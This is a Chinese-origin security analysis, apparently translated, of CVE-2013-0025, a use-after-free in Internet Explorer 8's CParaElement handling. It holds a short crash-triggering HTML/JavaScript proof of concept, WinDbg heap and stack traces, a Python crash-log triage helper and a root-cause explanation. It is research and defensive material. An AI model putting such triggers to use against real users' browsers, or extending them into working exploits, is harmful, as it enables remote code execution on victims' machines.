CVE-2013-0025
Microsoft IE 'SLayoutRun' Use-After-Free Vulnerability (CNNVD-201302-197)
Microsoft Internet Explorer is the web browser bundled by default with the Microsoft Windows operating system.
A use-after-free vulnerability exists in SLayoutRun in Microsoft Internet Explorer 8. By luring a victim to a crafted web site, a remote attacker can trigger access to an already deleted object and exploit the flaw to execute arbitrary code.
Test environment
Windows 7
IE 8.0.7600.16385
The PoC code is as follows:
<!doctype html>
<html>
<head></head>
<body>
<p> </p>
<script>
Math.tan(2,3);                          // marker call: a breakpoint on jscript!tan shows where this runs
document.body.style.whiteSpace = "pre-line";
setTimeout("document.body.innerHTML = 'i'",100);   // replaces the body content and frees the <p> element
</script>
</body>
</html>
1:023> r
eax=1ca0afb0 ebx=0411e8d8 ecx=00000000 edx=10001000 esi=1ceaefd8 edi=1ceaefd8
eip=65477386 esp=0411e84c ebp=0411e84c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
65477386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:1ceaeff4=????????
1:023> !heap -p -a esi
address 07620fd8 found in
_DPH_HEAP_ROOT @ 1a1000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
75e06e8:
6fcd90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
ntdll!RtlDebugFreeHeap+0x0000002f
77857aca ntdll!RtlpFreeHeap+0x0000005d
77822d68 ntdll!RtlFreeHeap+0x00000142
771af1ac kernel32!HeapFree+0x00000014
6a2a930e mshtml!operator delete[]+0x00000016
6a318c8d mshtml!CParaElement::`vector deleting destructor'+0x0000001f
6a2b7dd0 mshtml!CBase::SubRelease+0x00000022
6a310fdf mshtml!CElement::PrivateExitTree+0x00000011
6a1f5b42 mshtml!CMarkup::SpliceTreeInternal+0x00000083
6a1f6ff9 mshtml!CDoc::CutCopyMove+0x000000ca
6a1f6f39 mshtml!CDoc::Remove+0x00000018
6a1f6f17 mshtml!RemoveWithBreakOnEmpty+0x0000003a
6a1f7aef mshtml!InjectHtmlStream+0x00000191
6a1f793e mshtml!HandleHTMLInjection+0x0000005c
6a1f71fa mshtml!CElement::InjectInternal+0x00000307
6a1f704a mshtml!CElement::InjectCompatBSTR+0x00000046
6a1f988c mshtml!CElement::put_innerHTML+0x00000040
6a3372d6 mshtml!GS_BSTR+0x000001ac
6a32235c mshtml!CBase::ContextInvokeEx+0x000005dc
6a32c75a mshtml!CElement::ContextInvokeEx+0x0000009d
6a32c79a mshtml!CInput::VersionedInvokeEx+0x0000002d
6a2d3104 mshtml!PlainInvokeEx+0x000000eb
6c75a22a jscript!IDispatchExInvokeEx2+0x00000104
6c75a175 jscript!IDispatchExInvokeEx+0x0000006a
6c75a3f6 jscript!InvokeDispatchEx+0x00000098
6c75a4a0 jscript!VAR::InvokeByName+0x00000139
6c76d8c8 jscript!VAR::InvokeDispName+0x0000007d
6c759c0e jscript!CScriptRuntime::Run+0x0000208d
6c765c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
6c765bfb jscript!ScrFncObj::Call+0x0000008d
6c765e11 jscript!CSession::Execute+0x0000015f
Reuse:
1:023> r
eax=1ca0afb0 ebx=0411e8d8 ecx=00000000 edx=10001000 esi=1ceaefd8 edi=1ceaefd8
eip=65477386 esp=0411e84c ebp=0411e84c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
65477386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:1ceaeff4=????????
Allocation:
1:021> g
Breakpoint 2 hit
eax=077e6fd8 ebx=07cfefd0 ecx=7721349f edx=00000000 esi=077e6fd8 edi=07d59f70
eip=6830480f esp=0440f4a4 ebp=0440f4b0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CElement::CElement:
6830480f 8bff mov edi,edi
1:021> dd eax
077e6fd8 00000000 00000000 00000000 00000000
077e6fe8 00000000 00000000 00000000 00000000
077e6ff8 00000000 00000000 ???????? ????????
077e7008 ???????? ???????? ???????? ????????
077e7018 ???????? ???????? ???????? ????????
077e7028 ???????? ???????? ???????? ????????
077e7038 ???????? ???????? ???????? ????????
077e7048 ???????? ???????? ???????? ????????
1:021> kv
ChildEBP RetAddr Args to Child
0440f4a0 68322dbf 0000004d 05832680 0440f4c4 mshtml!CElement::CElement
0440f4b0 68327e98 0000004d 05832680 07cfef08 mshtml!CBlockElement::CBlockElement+0x12
0440f4c4 68304be9 07d59f70 05832680 0440f500 mshtml!CParaElement::CreateElement+0x26
0440f4f0 68308961 0440f524 07a04f30 00000000 mshtml!CreateElement+0x43
0440f51c 68306e93 00000000 071fafb0 07d59f70 mshtml!CHtmParse::ParseBeginTag+0xe3
0440f538 683075c9 7710ef76 071fafb0 071fafb0 mshtml!CHtmParse::ParseToken+0x82
0440f5e0 682f78e8 071fafb0 0af194c6 0af194c6 mshtml!CHtmPost::ProcessTokens+0x237
0440f6a4 682f8a99 0af194c6 00000000 071fafb0 mshtml!CHtmPost::Exec+0x221
0440f6bc 682f89fd 0af194c6 00000000 071fafb0 mshtml!CHtmPost::Run+0x15
0440f6dc 682f7c66 057e4d58 0af194c6 071fafb0 mshtml!PostManExecute+0x1fb
0440f6f8 683113f6 00000001 00000007 0440f718 mshtml!PostManResume+0xf7
0440f708 682f53fc 07d06f98 071fafb0 0440f74c mshtml!CHtmPost::OnDwnChanCallback+0x10
0440f718 683994b2 07d06f98 00000000 057e4d58 mshtml!CDwnChan::OnMethodCall+0x19
0440f74c 683837f7 0440f7e8 00008002 00000000 mshtml!GlobalWndOnMethodCall+0xff
0440f76c 76c686ef 004c0314 00000008 00000000 mshtml!GlobalWndProc+0x10c
0440f798 76c68876 68371de3 004c0314 00008002 USER32!InternalCallWinProc+0x23
0440f810 76c689b5 00000000 68371de3 004c0314 USER32!UserCallWinProcCheckWow+0x14b (FPO: [Non-Fpo])
0440f870 76c68e9c 68371de3 00000000 0440f8f8 USER32!DispatchMessageWorker+0x35e (FPO: [Non-Fpo])
0440f880 6ea704a6 0440f898 00000000 017ecf58 USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])
0440f8f8 6ea80446 04fba808 00000000 02f40ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x452 (FPO: [Non-Fpo])
Free:
(68327ec0) mshtml!CParaElement::`vftable' | (68328169) mshtml!CStyleSelector::SetSelectorPart
Exact matches:
mshtml!CParaElement::`vftable' = <no type information>
ChildEBP RetAddr Args to Child
0438eddc 68387db6 0791cf30 00000000 0438ef48 mshtml!CBase::SubRelease (FPO: [0,0,0])
0438edec 683e0fdf 07f2afd8 00000000 682c660e mshtml!CBase::PrivateRelease+0x3c
0438edf8 682c660e 0791cf30 00000000 00000018 mshtml!CElement::PrivateExitTree+0x11 (FPO: [0,0,1])
0438ef48 682c5b42 0438f06c 0438efbc 00000000 mshtml!CSpliceTreeEngine::RemoveSplice+0x841
0438f028 682c6ff9 0438f060 0438f06c 00000000 mshtml!CMarkup::SpliceTreeInternal+0x83
0438f078 682c6f39 0438f220 0438f25c 00000001 mshtml!CDoc::CutCopyMove+0xca
0438f094 682c6f17 0438f220 0438f25c 00000000 mshtml!CDoc::Remove+0x18
0438f0ac 682c7aef 0438f25c 07b70e74 683791b8 mshtml!RemoveWithBreakOnEmpty+0x3a
0438f1a8 682c793e 0438f220 0438f25c 0438f1d0 mshtml!InjectHtmlStream+0x191
0438f1e4 682c71fa 0438f220 0438f25c 00000002 mshtml!HandleHTMLInjection+0x5c
0438f29c 682c704a 00000000 00000001 07b70e74 mshtml!CElement::InjectInternal+0x307
0438f2b8 682c988c 05680fd0 00000000 00000001 mshtml!CElement::InjectCompatBSTR+0x46
0438f2d8 684072d6 00680fd0 07b70e74 07b7ffd0 mshtml!CElement::put_innerHTML+0x40
0438f308 683f235c 05680fd0 07b7ffd0 07039fd8 mshtml!GS_BSTR+0x1ac
0438f37c 683fc75a 05680fd0 80010402 00000002 mshtml!CBase::ContextInvokeEx+0x5dc
0438f3cc 683fc79a 05680fd0 80010402 00000002 mshtml!CElement::ContextInvokeEx+0x9d
0438f3f8 683a3104 05680fd0 80010402 00000002 mshtml!CInput::VersionedInvokeEx+0x2d
0438f44c 6bcfa22a 06b12fd8 80010402 00000002 mshtml!PlainInvokeEx+0xeb
0438f488 6bcfa175 07328d10 80010402 00000409 jscript!IDispatchExInvokeEx2+0x104
0438f4c4 6bcfa3f6 07328d10 00000409 00000004 jscript!IDispatchExInvokeEx+0x6a
(96c.c6c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07912fb0 ebx=0438edb8 ecx=00000000 edx=10001000 esi=07f2afd8 edi=07f2afd8
eip=68387386 esp=0438ed2c ebp=0438ed2c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
68387386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:07f2aff4=????????
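An added triage helper, not part of the original post, that automates the correlation done above by hand: it reads a WinDbg register dump plus the `!heap -p -a` output for the faulting register, confirms that the pointer lands in a free-ed page-heap block, and pulls the freed object's type and the DOM setter (here `put_innerHTML`) out of the freeing call stack. The sample log is constructed from the dumps on this page with the addresses made consistent.

```python
"""Triage a WinDbg use-after-free crash log captured with page heap enabled."""
import re

# Constructed sample modelled on the dumps on this page (addresses made consistent):
# register state at the AV, then '!heap -p -a' on the register that faulted.
SAMPLE_LOG = """\
(96c.c6c): Access violation - code c0000005 (first chance)
eax=07912fb0 ebx=0438edb8 ecx=00000000 edx=10001000 esi=07620fd8 edi=07620fd8
eip=68387386 esp=0438ed2c ebp=0438ed2c iopl=0 nv up ei pl nz na pe nc
mshtml!ElementWantsNotification+0x5:
68387386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:07620ff4=????????
1:023> !heap -p -a esi
address 07620fd8 found in
_DPH_HEAP_ROOT @ 1a1000
in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
    6fcd90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    6a2a930e mshtml!operator delete[]+0x00000016
    6a318c8d mshtml!CParaElement::`vector deleting destructor'+0x0000001f
    6a2b7dd0 mshtml!CBase::SubRelease+0x00000022
    6a1f988c mshtml!CElement::put_innerHTML+0x00000040
    6c75a22a jscript!IDispatchExInvokeEx2+0x00000104
"""

REG_RE = re.compile(r"\b(e[a-d]x|e[sd]i|e[sb]p)=([0-9a-f]{8})")
FAULT_RE = re.compile(r"\[(e[a-d]x|e[sd]i|e[sb]p)(?:[+-][0-9A-Fa-f]+h?)?\]")
FRAME_RE = re.compile(r"^\s*(?:[0-9a-f]{8}\s+)?(\w+)!(\S.*?)\+0x[0-9a-f]+\s*$", re.M)
FREED_RE = re.compile(r"address ([0-9a-f]{8}) found in.*?\nin free-ed allocation", re.S)

def triage_uaf(log):
    """Return which register held the stale pointer, the freed object's type (from
    the destructor frame) and the DOM setter on the freeing stack (the JS trigger)."""
    regs = dict(REG_RE.findall(log))
    fault = FAULT_RE.search(log)            # e.g. [esi+1Ch] in the faulting instruction
    if not regs or not fault:
        return None
    reg = fault.group(1)
    freed = FREED_RE.search(log)
    # Frames below 'free-ed allocation' are the stack that released the block
    frames = [f"{m}!{s}" for m, s in FRAME_RE.findall(log)] if freed else []
    dtor = next((f for f in frames if "deleting destructor" in f), None)
    setter = next((f for f in frames if "::put_" in f), None)
    return {
        "register": reg,
        "pointer": regs[reg],
        "freed_block": freed.group(1) if freed else None,
        "is_uaf": bool(freed) and freed.group(1) == regs[reg],
        "freed_type": dtor.split("!")[1].split("::")[0] if dtor else None,
        "trigger": setter.split("!")[1] if setter else None,
    }
```

Running `triage_uaf(SAMPLE_LOG)` reports esi as the stale pointer, CParaElement as the freed type and CElement::put_innerHTML as the trigger, matching the manual analysis above.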
Next, try to map the allocation, free and reuse onto the JS statements.
Modified PoC (Math.tan/sin/cos act as markers: breakpoints on jscript!tan, jscript!sin and jscript!cos show which statement has just executed):
<!doctype html>
<html>
<head></head>
<body>
<p> </p>
<script>
Math.tan(2,3);                          // marker 1: before the style change
document.body.style.whiteSpace = "pre-line";
Math.sin(0);                            // marker 2: after the style change
setTimeout("document.body.innerHTML = 'i'",100);
Math.cos(0);                            // marker 3: after the timer is armed; innerHTML fires later
</script>
</body>
</html>
The UAF element, CParaElement, is created by the <p> </p> tag.
1:020> g
Breakpoint 1 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d8c0 esp=0423ecf4 ebp=0423ed30 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
jscript!tan:
6be7d8c0 ff258010e56b jmp dword ptr [jscript!_imp__tan (6be51080)] ds:0023:6be51080={msvcrt!tan (758dde34)}
1:020> g
Breakpoint 3 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d711 esp=0423ecf4 ebp=0423ed30 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
jscript!sin:
6be7d711 ff256810e56b jmp dword ptr [jscript!_imp__sin (6be51068)] ds:0023:6be51068={msvcrt!sin (758d8aea)}
1:020> g
Breakpoint 2 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d67f esp=0423ecf4 ebp=0423ed30 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
jscript!cos:
6be7d67f ff259010e56b jmp dword ptr [jscript!_imp__cos (6be51090)] ds:0023:6be51090={msvcrt!cos (758d8ace)}
1:020> g
eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384
eip=68387d27 esp=0423df4c ebp=0423df60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8 add dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=00000010
1:020> g
eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384
eip=68387d27 esp=0423df4c ebp=0423df60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8 add dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=00000010
1:020> g
eax=00000043 ebx=00000000 ecx=0792afd8 edx=00000000 esi=0792afd8 edi=00000000
eip=68387d27 esp=0423e8f8 ebp=0423e904 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8 add dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=0000000a
1:020> g
(6b0.f20): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=079d2fb0 ebx=0423e8d0 ecx=00000000 edx=10001000 esi=0792afd8 edi=0792afd8
eip=68387386 esp=0423e844 ebp=0423e844 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
68387386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:0792aff4=????????
From CElement::put_innerHTML in the backtrace, the free can be attributed to the PoC's document.body.innerHTML = 'i'.
No obvious JS statement corresponds to the reuse.
Root cause analysis
The cause of this vulnerability is that a CTreeNode that was never freed still holds a dangling pointer to the CParaElement object; the CTreeNode is not freed because it is incorrectly referenced by a CTreeDataPos object.